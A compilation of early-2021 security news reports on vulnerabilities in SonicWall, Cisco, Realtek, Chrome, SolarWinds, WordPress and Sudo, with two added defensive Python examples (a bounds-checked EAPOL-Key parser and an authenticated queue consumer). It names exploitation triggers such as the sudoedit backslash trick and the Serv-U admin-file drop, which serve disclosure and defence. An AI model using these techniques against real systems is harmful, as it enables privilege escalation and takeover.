“SonicWall is announcing the availability of an SMA 100 series firmware 10.2.0.5-29sv update to patch a zero-day vulnerability on SMA 100 series 10.x code. All SMA 100 series users must apply this patch IMMEDIATELY to avoid potential exploitation.” reads the advisory published by the company.

The updates are available for the following appliances:

Physical Appliances: SMA 200, SMA 210, SMA 400, SMA 410
Virtual Appliances: SMA 500v (Azure, AWS, ESXi, HyperV)
SonicWall disclosed a security breach on January 22; it blamed sophisticated threat actors for the intrusion.

On January 29, SonicWall announced it was investigating the presence of a zero-day vulnerability in the Secure Mobile Access (SMA) gateways.

SMA gateways are used by enterprise organizations to provide access to resources on intranets to remote employees.

At the end of January, security experts from the firm NCC Group detected "indiscriminate" exploitation of a SonicWall zero-day in attacks in the wild.

NCC Group first disclosed the attacks on SonicWall devices on Sunday but did not provide details about the flaw exploited by the threat actors.

At the time, the NCC team confirmed that it had demonstrated how to exploit a possible candidate for the vulnerability.

SonicWall experts pointed out that proof of concept (PoC) exploit code utilizing the Shellshock exploit shared on social media is not effective against its devices.

“We’re also aware of social media posts that shared either supposed proof of concept (PoC) exploit code utilizing the Shellshock exploit, or screenshots of allegedly compromised devices. We have confirmed that the Shellshock attack has been mitigated by patches that we released in 2015. We have also tested the shared PoC code and have so far concluded that it is not effective against firmware released after the 2015 patch.” continues the update. “However, we’ll continue to closely monitor any new posts and investigate new information. This should also serve as a reminder to our customer base to always patch and keep current on internet facing devices.”

While waiting for the patches to become available, SonicWall also released an updated security best practices guide for the SMA 100 series devices.


Cisco fixes critical remote code execution issues in SMB VPN routers
5.2.2021 
Vulnerebility  Securityaffairs

Cisco addressed multiple pre-auth remote code execution (RCE) flaws in small business VPN routers that allow executing arbitrary code as root.
Cisco has fixed several pre-auth remote code execution (RCE) issues in multiple small business VPN routers. The flaws could be exploited by unauthenticated, remote attackers to execute arbitrary code as root on vulnerable devices.

The flaws (CVE-2021-1289, CVE-2021-1290, CVE-2021-1291, CVE-2021-1292, CVE-2021-1293, CVE-2021-1294, CVE-2021-1295) have received a CVSS score of 9.8/10.

The flaws reside in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers.

“Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device.” reads the advisory published by Cisco.

“These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device.”

The IT giant revealed that the vulnerabilities affect the following Cisco Small Business Routers if they are running a firmware release earlier than Release 1.0.01.02:

RV160 VPN Router
RV160W Wireless-AC VPN Router
RV260 VPN Router
RV260P VPN Router with POE
RV260W Wireless-AC VPN Router
while the following devices are not affected:
RV340 Dual WAN Gigabit VPN Router
RV340W Dual WAN Gigabit Wireless-AC VPN Router
RV345 Dual WAN Gigabit VPN Router
RV345P Dual WAN Gigabit POE VPN Router
Cisco has addressed the flaws with the release of firmware version 1.0.01.02 and later; the vendor added that there are no workarounds that address these vulnerabilities.

The good news is that the Cisco Product Security Incident Response Team (PSIRT) is not aware of attacks in the wild exploiting the above vulnerabilities.

The vulnerabilities were reported to Cisco by T. Shiomitsu from Trend Micro Zero Day, swings of Chaitin Security Research Lab, and simp1e of 1AQ Team.

Cisco today also addressed high severity vulnerabilities impacting other business routers and the IOS XR software.

Last month, Cisco also patched several pre-auth RCE vulnerabilities affecting multiple SD-WAN products and the Cisco Smart Software Manager software.


Cisco Patches Critical Vulnerabilities in Small Business Routers, SD-WAN
5.2.2021 
Vulnerebility  Securityweek

Cisco this week released software updates to address multiple vulnerabilities across its product portfolio, including critical severity bugs in several small business VPN routers and SD-WAN products.

The company warned that the web-based management interface of small business RV160, RV160W, RV260, RV260P, and RV260W VPN routers is affected by seven severe vulnerabilities that could be abused by unauthenticated, remote attackers to execute arbitrary code as root.

The issue, Cisco says, exists because of improper validation of HTTP requests. Rated critical severity (CVSS score of 9.8), the flaws were addressed with the release of firmware versions 1.0.01.02 and later for all of the affected products. Two high severity vulnerabilities were also fixed in these devices.

The tech company also released fixes for six bugs in SD-WAN products, the most important of which is rated critical severity (CVSS score 9.9). While not dependent on each other, the resolved issues could be abused to perform actions with root privileges on the affected devices.

Created by the improper input validation of user-supplied input, the flaws impact SD-WAN vBond Orchestrator Software, SD-WAN vEdge Cloud Routers, SD-WAN vEdge Routers, SD-WAN vManage Software, and SD-WAN vSmart Controller Software.

Cisco addressed these security holes in SD-WAN releases 19.2.4, 20.1.2, 20.3.2, and 20.4.1. The company also notes that it is not aware of these bugs being exploited in the wild.

This week, the company also detailed numerous high severity flaws in small business RV series routers, including a set of 30 bugs leading to arbitrary code execution or denial of service, and another of 5 issues that a remote attacker could exploit to inject arbitrary commands and have them executed with root privileges.

Caused by improper validation of user-supplied input, the flaws impact RV016, RV042, RV042G, RV082, RV320, and RV325 series routers, and were addressed with the release of firmware version 1.5.1.13 for RV320 and RV325 routers.

The Cisco RV016, RV042, RV042G, and RV082 routers, however, won’t receive patches, because they have already reached end-of-life status.

Other high risk vulnerabilities that Cisco patched this week affect IOS XR software: one denial of service in the IPv6 protocol handling and two in the ingress packet processing function of IOS XR software, and two image verification bugs and one privilege escalation that affect IOS XR software for the Cisco 8000 series routers and Network Convergence System (NCS) 540 series routers.

Multiple high severity issues were addressed in SD-WAN products as well, including five flaws that could lead to denial of service, and three authorization bypasses that could allow attackers to modify configurations, access sensitive information, or view data without authorization.

Cisco also released patches for medium severity flaws in Webex, Unified Computing System (UCS), IOS XR Software, Managed Services Accelerator (MSX), and DNA Center, and announced that it would release software updates to fix multiple bugs in the DNS forwarder implementation of dnsmasq.

On Wednesday, the tech company expanded the list of products affected by the recent Sudo vulnerability with the addition of Virtual Topology System (formerly Cisco Virtual Systems Operations Center) - VTSR VM and Ultra Cloud.

Further information on the vulnerabilities Cisco has addressed in its products this week can be found on the company’s security portal.


Vulnerabilities in Realtek Wi-Fi Module Expose Many Devices to Remote Attacks
5.2.2021 
Vulnerebility  Securityweek

Major vulnerabilities in the Realtek RTL8195A Wi-Fi module expose embedded devices used in a myriad of industries to remote attacks, researchers with automated device security platform provider Vdoo reveal.

The low-power Wi-Fi module is designed for use in embedded devices, and is being used in a broad range of industries, including automotive, agriculture, energy, healthcare, industrial, and security.

The RTL8195A chip supports WEP, WPA and WPA2 authentication modes, and Vdoo discovered that the WPA2 handshake mechanism is prone to stack overflow and out-of-bounds read bugs.

Tracked as CVE-2020-9395, the most severe of the flaws is a remotely exploitable stack overflow that could lead to a complete takeover of the module and the device’s wireless communications. The vulnerability can be exploited by an attacker in the proximity of a vulnerable system, even if they don’t know the Wi-Fi network password (Pre-Shared-Key, or PSK).

Two other vulnerabilities (an out-of-bounds read and a stack-based buffer overflow) could also be exploited without knowing the network security key (the PMK, which is derived from the PSK), to execute code remotely or cause a denial of service (DoS) condition.

All of the remaining three vulnerabilities are stack-based buffer overflow issues that could lead to remote code execution, but exploitation requires the attacker to know the network's PSK. Thus, the use of a strong, private WPA2 passphrase should prevent exploitation of these bugs.

Realtek has published an advisory for CVE-2020-9395 only, revealing that RTL8711AM, RTL8711AF, and RTL8710AF modules are also vulnerable.

“An issue was discovered on Realtek RTL8195AM, RTL8711AM, RTL8711AF, and RTL8710AF devices before 2.0.6. A stack-based buffer overflow exists in the client code that takes care of WPA2’s 4-way-handshake via a malformed EAPOL-Key packet with a long keydata buffer,” Realtek explains.

According to Vdoo’s researchers, because no mitigating factors are in place, exploitation of this vulnerability is trivial. Exploitation is possible regardless of whether the victim is the client or the access point.

Vdoo says all of these vulnerabilities have been addressed in the latest version of Ameba Arduino (2.0.8 and above). Updated versions of the Ameba SDK are available on Realtek’s website.

Device versions built after March 3, 2020, are patched against CVE-2020-9395, while versions built after April 21, 2020 are completely patched against all issues.


SonicWall Patches SMA Zero-Day Vulnerability Exploited in Attacks
5.2.2021 
Vulnerebility  Securityweek

SonicWall on Wednesday announced that it released firmware updates for its Secure Mobile Access (SMA) 100 series appliances to patch an actively exploited zero-day vulnerability.

The patch is included in firmware version 10.2.0.5-29sv, which users have been advised to immediately apply to avoid potential attacks. The vendor said the patch also contains additional code designed to strengthen devices.

SonicWall, which specializes in firewalls and other cybersecurity solutions, previously told SecurityWeek that a few thousand devices are exposed to attacks due to the vulnerability.

The critical patch can be applied to SMA 200, 210, 400 and 410 physical appliances, and SMA 500v virtual appliances on Azure, AWS, ESXi and Hyper-V. Other SonicWall products do not appear to be impacted.

The vulnerability, which has been rated critical with a CVSS score of 9.8, now also has a CVE identifier: CVE-2021-20016.

The company explained that a hacker can launch a “remote code execution attack” after gaining access to admin credentials.

“A vulnerability resulting in improper SQL command neutralization in the SonicWall SSLVPN SMA100 product allows remote exploitation for credential access by an unauthenticated attacker,” reads SonicWall’s advisory for CVE-2021-20016.

SonicWall informed customers on January 22 that its internal systems were targeted in an attack apparently launched by sophisticated threat actors that may have exploited zero-day vulnerabilities in the company’s secure remote access products.

The company launched an investigation, but couldn’t confirm the existence of a zero-day vulnerability in its SMA 100 series appliances until February 1, shortly after cybersecurity firm NCC Group reported seeing “indiscriminate” attempts to exploit what appeared to be a previously unknown security flaw.

Until the patches were made available, SonicWall shared some recommendations on how customers can prevent potential attacks, including by enabling multi-factor authentication, blocking access to appliances on the firewall, shutting down vulnerable devices, or downgrading firmware to a version that is not affected.

Shortly after SonicWall disclosed the breach, some anonymous individuals claimed the company was hit by ransomware and the attackers had stolen source code and customer data, but none of those claims have been confirmed. The “proof” seen by SecurityWeek at the time seemed questionable.

SonicWall says it cannot provide any additional information at this time.


New Chrome Browser 0-day Under Active Attack—Update Immediately!
5.2.2021 
Vulnerebility  Thehackernews

Google has patched a zero-day vulnerability in Chrome web browser for desktop that it says is being actively exploited in the wild.

The company released 88.0.4324.150 for Windows, Mac, and Linux, with a fix for a heap buffer overflow flaw (CVE-2021-21148) in its V8 JavaScript rendering engine.

"Google is aware of reports that an exploit for CVE-2021-21148 exists in the wild," the company said in a statement.

The security flaw was reported to Google by Mattias Buelens on January 24.

Previously, on February 2, Google addressed six issues in Chrome, including one critical use-after-free vulnerability in Payments (CVE-2021-21142) and four high severity issues in the Extensions, Tab Groups, Fonts, and Navigation features.

While it's typical of Google to limit details of the vulnerability until a majority of users are updated with the fix, the development comes weeks after Google and Microsoft disclosed attacks carried out by North Korean hackers against security researchers with an elaborate social engineering campaign to install a Windows backdoor.

With some researchers infected simply by visiting a fake research blog on fully patched systems running Windows 10 and Chrome browser, Microsoft, in a report published on January 28, had hinted that the attackers likely leveraged a Chrome zero-day to compromise the systems.

Although it's not immediately clear if CVE-2021-21148 was used in these attacks, the timing of the revelations and the fact that Google's advisory came out exactly one day after Buelens reported the issue implies they could be related.

In a separate technical write-up, South Korean cybersecurity firm ENKI said the North Korean state-sponsored hacking group known as Lazarus made an unsuccessful attempt at targeting its security researchers with malicious MHTML files that, when opened, downloaded two payloads from a remote server, one of which contained a zero-day against Internet Explorer.

"The secondary payload contains the attack code that attacks the vulnerability of the Internet Explorer browser," ENKI researchers said.

It's worth noting that Google last year fixed five Chrome zero-days that were actively exploited in the wild in a span of one month between October 20 and November 12.


Critical Bugs Found in Popular Realtek Wi-Fi Module for Embedded Devices
5.2.2021 
Vulnerebility  Thehackernews

Major vulnerabilities have been discovered in the Realtek RTL8195A Wi-Fi module that could have been exploited to gain root access and take complete control of a device's wireless communications.

The six flaws were reported by researchers from Israeli IoT security firm Vdoo.

The Realtek RTL8195A module is a standalone, low-power-consumption Wi-Fi hardware module targeted at embedded devices used in several industries such as agriculture, smart home, healthcare, gaming, and automotive sectors.

It also makes use of an "Ameba" API, allowing developers to communicate with the device via Wi-Fi, HTTP, and MQTT, a lightweight messaging protocol for small sensors and mobile devices.

Although the issues uncovered by Vdoo were verified only on RTL8195A, the researchers said they extend to other modules as well, including RTL8711AM, RTL8711AF, and RTL8710AF.

The flaws concern a mix of stack overflow, and out-of-bounds reads that stem from the Wi-Fi module's WPA2 four-way handshake mechanism during authentication.

Chief among them is a buffer overflow vulnerability (CVE-2020-9395) that permits an attacker in the proximity of an RTL8195 module to completely take over the module, without having to know the Wi-Fi network password (or pre-shared key) and regardless of whether the module is acting as a Wi-Fi access point (AP) or client.

Two other flaws can be abused to stage a denial of service, while another set of three weaknesses, including CVE-2020-25854, could allow exploitation of Wi-Fi client devices and execute arbitrary code.

Thus, in one of the potential attack scenarios, an adversary with prior knowledge of the passphrase for the WPA2 Wi-Fi network that the victim device is connected to can create a malicious AP by sniffing the network's SSID and Pairwise Transient Key (PTK) — which is used to encrypt traffic between a client and the AP — and force the target to connect to the new AP and run malicious code.

Realtek, in response, has released Ameba Arduino 2.0.8 with patches for all the six vulnerabilities found by Vdoo. It's worth noting that firmware versions released after April 21, 2020, already come with the necessary protections to thwart such takeover attacks.

"An issue was discovered on Realtek RTL8195AM, RTL8711AM, RTL8711AF, and RTL8710AF devices before 2.0.6," the company said in a security bulletin. "A stack-based buffer overflow exists in the client code that takes care of WPA2's 4-way-handshake via a malformed EAPOL-Key packet with a long keydata buffer."
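Realtek's bulletin, quoted here and in the SecurityWeek item on the same module earlier on this page, attributes CVE-2020-9395 to a malformed EAPOL-Key packet whose key data field is longer than the handshake code expects. That is a length-validation failure at the parser: the declared key data length has to be checked against both the bytes actually received and the capacity of the buffer it is copied into, before any copy happens. The Python parser below is an added illustration of that receive-side check, not Realtek's, Vdoo's or any supplicant's code. The field layout follows the IEEE 802.11 EAPOL-Key descriptor with a 16-byte MIC; MAX_KEY_DATA is an assumed receiver capacity, and build_eapol_key and the frames it produces are constructed for the demonstration.

```python
import struct
from typing import NamedTuple, Optional

EAPOL_TYPE_KEY = 3   # EAPOL packet type for EAPOL-Key
KEY_DESC_RSN = 2     # IEEE 802.11 RSN key descriptor
# EAPOL header: protocol version, packet type, body length.
EAPOL_HDR = struct.Struct(">BBH")
# Fixed part of the key descriptor (16-byte MIC variant): descriptor type,
# key information, key length, replay counter, nonce, IV, RSC, reserved,
# MIC, key data length. 95 bytes in total; key data follows.
KEY_HDR = struct.Struct(">BHHQ32s16s8s8s16sH")
# Assumed receiver-side capacity for key data. It stands in for the fixed
# buffer a firmware supplicant copies key data into; the value is arbitrary.
MAX_KEY_DATA = 256


class EapolKey(NamedTuple):
    key_info: int
    key_length: int
    replay_counter: int
    nonce: bytes
    mic: bytes
    key_data: bytes


def parse_eapol_key(frame: bytes, max_key_data: int = MAX_KEY_DATA) -> EapolKey:
    """Parse an EAPOL-Key frame, refusing any frame whose declared lengths do
    not fit the bytes received or the receiver's buffer."""
    if len(frame) < EAPOL_HDR.size:
        raise ValueError("truncated EAPOL header")
    _version, ptype, body_len = EAPOL_HDR.unpack_from(frame)
    if ptype != EAPOL_TYPE_KEY:
        raise ValueError(f"not an EAPOL-Key frame (type {ptype})")
    body = frame[EAPOL_HDR.size:]
    if body_len > len(body):
        raise ValueError("EAPOL body length exceeds received bytes")
    body = body[:body_len]
    if len(body) < KEY_HDR.size:
        raise ValueError("EAPOL-Key body shorter than the fixed key descriptor")
    (desc, key_info, key_len, replay, nonce, _iv, _rsc, _rsv, mic,
     kd_len) = KEY_HDR.unpack_from(body)
    if desc != KEY_DESC_RSN:
        raise ValueError(f"unsupported key descriptor {desc}")
    remaining = len(body) - KEY_HDR.size
    # The two checks that matter: the declared length must be covered by the
    # bytes present, and it must fit the buffer it will be copied into.
    if kd_len > remaining:
        raise ValueError(f"key data length {kd_len} exceeds {remaining} bytes present")
    if kd_len > max_key_data:
        raise ValueError(f"key data length {kd_len} exceeds receiver buffer {max_key_data}")
    key_data = body[KEY_HDR.size:KEY_HDR.size + kd_len]
    return EapolKey(key_info, key_len, replay, nonce, mic, key_data)


def rejection_reason(frame: bytes, **kwargs) -> Optional[str]:
    """Return why a frame would be dropped, or None if it parses cleanly."""
    try:
        parse_eapol_key(frame, **kwargs)
    except ValueError as exc:
        return str(exc)
    return None


def build_eapol_key(key_data: bytes, declared_len: Optional[int] = None,
                    key_info: int = 0x008A) -> bytes:
    """Construct a test frame (not captured traffic). declared_len lets a test
    misstate the key data length the way a malformed packet would. The default
    key_info is message 1 of the 4-way handshake: Pairwise | Ack, descriptor
    version 2."""
    kd_len = len(key_data) if declared_len is None else declared_len
    body = KEY_HDR.pack(KEY_DESC_RSN, key_info, 16, 1, b"\x11" * 32,
                        b"\x00" * 16, b"\x00" * 8, b"\x00" * 8,
                        b"\x00" * 16, kd_len) + key_data
    return EAPOL_HDR.pack(2, EAPOL_TYPE_KEY, len(body)) + body


if __name__ == "__main__":
    print(rejection_reason(build_eapol_key(b"\xdd\x04\x00\x0f\xac\x04")))
    print(rejection_reason(build_eapol_key(b"A" * 8, declared_len=0xFFFF)))
    print(rejection_reason(build_eapol_key(b"B" * 300)))
```

The same parser accepts a 300-byte key data field when called with a larger max_key_data, which is the point: the bound belongs to the receiver's storage, not to the sender's header, and a parser that trusts the header alone is the pattern the Realtek advisory describes.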


SolarWinds Orion Bug Allows Easy Remote-Code Execution and Takeover
4.2.2021 
Vulnerebility  Threatpost

The by-now infamous company has issued patches for three security vulnerabilities in total.

Three serious vulnerabilities have been found in SolarWinds products: Two in the Orion User Device Tracker and one in the Serv-U FTP for Windows product. The most severe of these could allow trivial remote code execution with high privileges.

The SolarWinds Orion platform is the network management tool at the heart of the recent espionage attack against several U.S. government agencies, tech companies and other high-profile targets. It allows users to manage devices, software and firmware versioning, applications and so on, and has full visibility into enterprise customer networks.

These fresh vulnerabilities have not been shown to be used in the spy attack, but admins should nonetheless apply patches as soon as possible, according to Martin Rakhmanov, security research manager for SpiderLabs at Trustwave.

Trustwave is not providing specific proof-of-concept (PoC) code until Feb. 9, in order to give SolarWinds users a longer time to patch, he noted in a Wednesday blog posting.

Microsoft Messaging for SolarWinds Orion Takeover
The most critical bug (CVE-2021-25274) does not require local access and allows complete control over SolarWinds Orion remotely without having any credentials at all.

As a part of the platform installation, there is a setup for Microsoft Messaging Queue (MSMQ), which is a two-decade-old technology that is no longer installed by default on modern Windows systems.

“Improper use of MSMQ could allow any remote unprivileged user the ability to execute any arbitrary code in the highest privilege,” according to Trustwave’s advisory, issued on Wednesday.

Rakhmanov said that it’s possible for unauthenticated users to send messages to private queues over TCP port 1801.

“My interest was piqued and I [also] jumped in to look at the code that handles incoming messages,” he explained. “Unfortunately, it turned out to be an unsafe deserialization victim. [This] allows remote code execution by remote, unprivileged users through combining those two issues. Given that the message processing code runs as a Windows service configured to use LocalSystem account, we have complete control of the underlying operating system.”
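Two defects combine in the account above: the queue accepts messages from anyone, and the consumer deserializes them with a mechanism that can instantiate arbitrary types. The Python example below is added to show the two corresponding controls in one consumer and is not SolarWinds code or a description of its fix: every message carries an HMAC over its body so unauthenticated messages are dropped before parsing, and the body is parsed with a data-only format (JSON) against an allow-list of message types and fields, so no message can name a class or trigger code. The shared key, the "device_status" schema and the sample messages are constructed for the demonstration.

```python
import hashlib
import hmac
import json
from typing import Any, Dict

# Constructed demo key; a real deployment would load it from a secret store.
# Without some per-message authentication, the queue accepts anyone's input.
QUEUE_KEY = b"constructed-demo-key-do-not-reuse"
TAG_LEN = hashlib.sha256().digest_size  # 32 bytes

# Allow-list of message types and the exact fields (with Python types) each
# may carry. Anything outside this table never reaches business logic.
SCHEMAS: Dict[str, Dict[str, type]] = {
    "device_status": {"device_id": str, "status": str, "uptime_s": int},
}


def sign_message(payload: Dict[str, Any], key: bytes = QUEUE_KEY) -> bytes:
    """Producer side: canonical JSON body prefixed with an HMAC-SHA256 tag."""
    body = json.dumps(payload, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, body, hashlib.sha256).digest() + body


def validate(obj: Any) -> Dict[str, Any]:
    """Reject anything that is not exactly one of the allow-listed shapes."""
    if not isinstance(obj, dict) or "type" not in obj:
        raise ValueError("message is not an object with a 'type'")
    schema = SCHEMAS.get(obj["type"])
    if schema is None:
        raise ValueError(f"unknown message type {obj['type']!r}")
    fields = {k: v for k, v in obj.items() if k != "type"}
    if set(fields) != set(schema):
        raise ValueError(f"fields {sorted(fields)} do not match {sorted(schema)}")
    for name, expected in schema.items():
        if type(fields[name]) is not expected:   # exact type; bool is not int here
            raise ValueError(f"field {name!r} has type {type(fields[name]).__name__}")
    return obj


def consume_message(raw: bytes, key: bytes = QUEUE_KEY) -> Dict[str, Any]:
    """Consumer side: authenticate first, then parse with a data-only format."""
    if len(raw) < TAG_LEN:
        raise ValueError("message too short to carry a tag")
    tag, body = raw[:TAG_LEN], raw[TAG_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise PermissionError("unauthenticated message dropped")
    # json.loads yields only dicts, lists, strings, numbers, booleans and
    # None; a message cannot name a type or run a constructor, unlike a
    # pickle.loads or BinaryFormatter-style deserializer fed attacker bytes.
    return validate(json.loads(body))


def outcome(raw: bytes, key: bytes = QUEUE_KEY) -> str:
    """Classify a raw message: 'ok', 'unauthenticated' or 'invalid'."""
    try:
        consume_message(raw, key)
    except PermissionError:
        return "unauthenticated"
    except (ValueError, json.JSONDecodeError):
        return "invalid"
    return "ok"


if __name__ == "__main__":
    msg = sign_message({"type": "device_status", "device_id": "rv-1",
                        "status": "up", "uptime_s": 42})
    print(outcome(msg))                                      # ok
    print(outcome(msg[:TAG_LEN] + msg[TAG_LEN:].replace(b"rv-1", b"rv-2")))  # unauthenticated
    print(outcome(sign_message({"type": "reboot_device", "device_id": "rv-1"})))  # invalid
```

Order matters in consume_message: the tag is checked before json.loads runs, so a parser bug is only reachable by a sender who holds the key. Where a queue cannot carry a tag, the equivalent control is to make the queue itself refuse unauthenticated senders; the schema check then still limits what an authenticated but compromised producer can push through.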

Info-Stealing from the Orion Database
The second bug (CVE-2021-25275) was also found in the SolarWinds Orion framework. It allows unprivileged users who can log in locally or via Remote Desktop Protocol (RDP) to obtain a cleartext password for the backend database for the Orion platform, called SolarWindsOrionDatabaseUser – and from there set themselves up as an admin to steal information.

“SolarWinds credentials are stored in an insecure manner that could allow any local users, despite privileges, to take complete control over the SOLARWINDS_ORION database,” according to Trustwave.

Permissions are generously granted to all locally authenticated users, Rakhmanov found, and authenticated users can generally read database file content. He ran “a simple grep” (a Unix command used to search files for the occurrence of a string of characters that matches a specified pattern) across the files installed by the product to look for a configuration file, which he located.

Inside the config file were the Orion backend database credentials, albeit encrypted.

“I spent some time finding code that decrypts the password but essentially, it’s a one-liner,” he noted.

Once an unprivileged user runs the decrypting code, they can get a cleartext password for the SolarWindsOrionDatabaseUser.

“The next step is to connect to the Microsoft SQL Server using the recovered account, and at this point, we have complete control over the SOLARWINDS_ORION database,” Rakhmanov explained. “From here, one can steal information or add a new admin-level user to be used inside SolarWinds Orion products.”

Adding Admin Users
The third issue is a SolarWinds Serv-U FTP vulnerability (CVE-2021-25276). The product is used for secure transfer and large file-sharing.

The bug allows local privilege escalation so that an attacker gains the ability to read, write to or delete any file on the system.

“Any local user, regardless of privilege, can create a file that can define a new Serv-U FTP admin account with full access to the C:\ drive,” according to Trustwave. “This account can then be used to log in via FTP and read or replace any file on the drive.”

Rakhmanov discovered that the platform’s directory access control lists allow complete compromise by any authenticated Windows user.

“Specifically, anyone who can log in locally or via Remote Desktop can just drop a file that defines a new user, and the Serv-U FTP will automatically pick it up,” he explained. “Next, since we can create any Serv-U FTP user, it makes sense to define an admin account by setting a simple field in the file and then set the home directory to the root of C:\ drive.”

SolarWinds patches are available, in Orion Platform 2020.2.4 and ServU-FTP 15.2.2 Hotfix 1.

Rakhmanov did issue a caveat on the fix for the CVE-2021-25275 info-stealing bug.

“After the patch is applied, there is a digital signature validation step performed on arrived messages so that messages having no signature or not signed with a per-installation certificate are not further processed,” he explained. “On the other hand, the MSMQ is still unauthenticated and allows anyone to send messages to it.”


TIM’s Red Team Research (RTR) discovered 2 new zero-day vulnerabilities in WordPress Plugin Limit Login Attempts Reloaded
4.2.2021 
Vulnerebility  Securityaffairs

Researchers from TIM’s Red Team Research (RTR) discovered 2 new zero-day vulnerabilities in WordPress Plugin Limit Login Attempts Reloaded
Italy has also joined the hunt for security bugs, through the Red Team Research laboratory of TIM, a major Italian telecommunications company.

Among the team’s objectives is to detect the vulnerabilities that a potential attacker could exploit to carry out cyber-attacks on TIM’s infrastructures and highlight the real impacts detected.

The activity is not limited to the verification of known vulnerabilities; it also includes dedicated research aimed at discovering new vulnerabilities that are not yet publicly known (zero-day vulnerabilities).

Today, TIM’s Red Team Research, led by Massimiliano Brolli, disclosed 2 new vulnerabilities in the Limit Login Attempts Reloaded WordPress plugin. The flaws were addressed by the plugin developer, WPChef, between June and December 2020.

This WordPress plugin is intended as a brute-force attack protection mechanism and currently has more than 1 million active installations.

According to the plugin description from the author page:

“Limit Login Attempts Reloaded stops brute-force attacks and optimizes your site performance by limiting the number of login attempts that are possible through the normal login as well as XMLRPC, Woocommerce and custom login pages.”

Cybersecurity researcher Veno Eivazian identified two security issues as part of a series of laboratory tests. One is a rate-limiting bypass under a non-default configuration, which effectively defeats the plugin’s purpose. The other is an unauthenticated reflected XSS.

The first one, Improper Restriction of Excessive Authentication Attempts (CWE-307), identified as CVE-2020-35590, has a CVSS3 score of 9.8.

The second one, Improper Neutralization of Input During Web Page Generation (CWE-79), identified as CVE-2020-35589, has a CVSS3 score of 5.4.

For some time we have been seeing a steady stream of previously undocumented vulnerabilities published by this IT security laboratory, Red Team Research (RTR) of the Italian telecommunications company TIM, which has already identified 37 new CVEs in about a year.

The laboratory has identified, from public sources available on the corporate website, vulnerabilities on vendors such as Oracle, Nokia, Siemens, Schneider Electric, QNAP, Selesta, WOWZA, MultiUX and recently WordPress, helping to improve overall IT security.

It is a small, all-Italian “Progetto Zero” that has attracted the attention of professionals because it publishes a new CVE roughly every 10 days, which is not bad at all.

The complete list of CVEs discovered by TIM researchers (formerly Telecom Italia S.p.A.) is available on the TIM corporate website.

TIM is one of the main Italian telecommunications companies, and one of the few Italian industrial companies to have devoted such a significant effort to the search for undocumented vulnerabilities.


Recent Sudo Vulnerability Affects Apple, Cisco Products
4.2.2021 
Vulnerebility  Securityweek

Apple’s macOS Big Sur operating system and multiple Cisco products are also affected by the recently disclosed major security flaw in the Sudo utility.

Tracked as CVE-2021-3156 and referred to as Baron Samedit, the issue is a heap-based buffer overflow that can be exploited by unprivileged users to gain root privileges on the vulnerable host.

For privilege escalation to root, the user needs to leverage "sudoedit -s" along with a command-line argument ending with a single backslash character.

The vulnerability was patched in Sudo 1.9.5p2.

Researchers at cybersecurity firm Qualys, who discovered the bug, only tested it on several Linux distributions, such as Debian, Fedora, and Ubuntu, but did warn that most Unix- and Linux-based systems are likely affected by the vulnerability.

According to Hacker House co-founder Matthew Hickey, Apple’s macOS Big Sur is one of the affected operating systems.

“CVE-2021-3156 also impacts @apple MacOS Big Sur (unpatched at present), you can enable exploitation of the issue by symlinking sudo to sudoedit and then triggering the heap overflow to escalate one's privileges to 1337 uid=0,” he said on Twitter.

Replying to Hickey, Will Dormann, a researcher with Carnegie Mellon University's CERT Coordination Center, has confirmed that macOS Big Sur is indeed vulnerable.

Apple this week issued patches for more than 60 vulnerabilities in macOS Big Sur, Catalina, and Mojave, but none of these addresses the bug in Sudo.

In an advisory published last week but updated twice since, Cisco reveals that it is currently investigating which of its products are affected by the Baron Samedit vulnerability. Many products are not affected and some are still under investigation, but several have been confirmed to be impacted.

Specifically, the issue affects Firepower Threat Defense (FTD), Prime Collaboration Provisioning, Prime Service Catalog Virtual Appliance, Smart Software Manager On-Prem, Nexus 3000 series switches, Nexus 9000 series switches in standalone NX-OS mode, and Paging Server (InformaCast).

“An attacker could exploit this vulnerability by accessing a Unix shell on an affected device and then invoking the sudoedit command with crafted parameters or by executing a binary exploit. A successful exploit could allow the attacker to execute commands or binaries with root privileges,” the company explains.

To date, there are no indicators that the Sudo vulnerability is being exploited in live attacks, but users are advised to apply patches for it as soon as they become available for their products.


SolarWinds Product Vulnerabilities Allow Hackers to Take Full Control of Systems
4.2.2021 
Vulnerebility  Securityweek

Cybersecurity firm Trustwave on Wednesday reported that one of its researchers recently discovered several potentially serious vulnerabilities in products made by Texas-based IT management solutions provider SolarWinds.

SolarWinds was recently targeted in a sophisticated supply chain attack that resulted in thousands of organizations receiving malicious updates for the company’s Orion monitoring product, and a few hundred — ones that presented an interest to the attackers — getting other malware that may have given the hackers deep access into their networks.

Following the disclosure of the attack, Trustwave researchers decided to analyze SolarWinds products based on the Orion framework to see if they contain any vulnerabilities that could expose the company’s customers to attacks. They discovered two vulnerabilities in Orion and one in Serv-U FTP software.

“To the best of Trustwave’s knowledge, none of the vulnerabilities were exploited during the recent SolarWinds attacks or in any ‘in the wild’ attacks,” Trustwave said in a blog post.

The security holes were reported to SolarWinds in late December 2020 and early January 2021. The Orion vulnerabilities were patched on January 25 with the release of version 2020.2.4, and the Serv-U issue is expected to be patched on February 3.

One of the Orion vulnerabilities, tracked as CVE-2021-25275, is related to the exposure of credentials for the backend database. The credentials, discovered by researchers in a configuration file, allow access to the Microsoft SQL Server system, which in turn provides control over the Orion database. Once they can access this database, an attacker could steal information or add new users with administrator privileges.

While exploitation of this vulnerability requires the attacker to have at least limited access to the targeted system, Trustwave researchers also discovered a more serious security hole that can be exploited remotely, without authentication.

This Orion flaw, tracked as CVE-2021-25274, is a deserialization issue and it can be exploited by a remote, unauthenticated attacker to execute arbitrary code on the targeted system with elevated privileges, giving them complete control of the underlying operating system.

The Serv-U vulnerability, identified as CVE-2021-25276, can be exploited by an attacker who has local access to the targeted system — or who has logged in via RDP — to read, write or delete any file on the system.

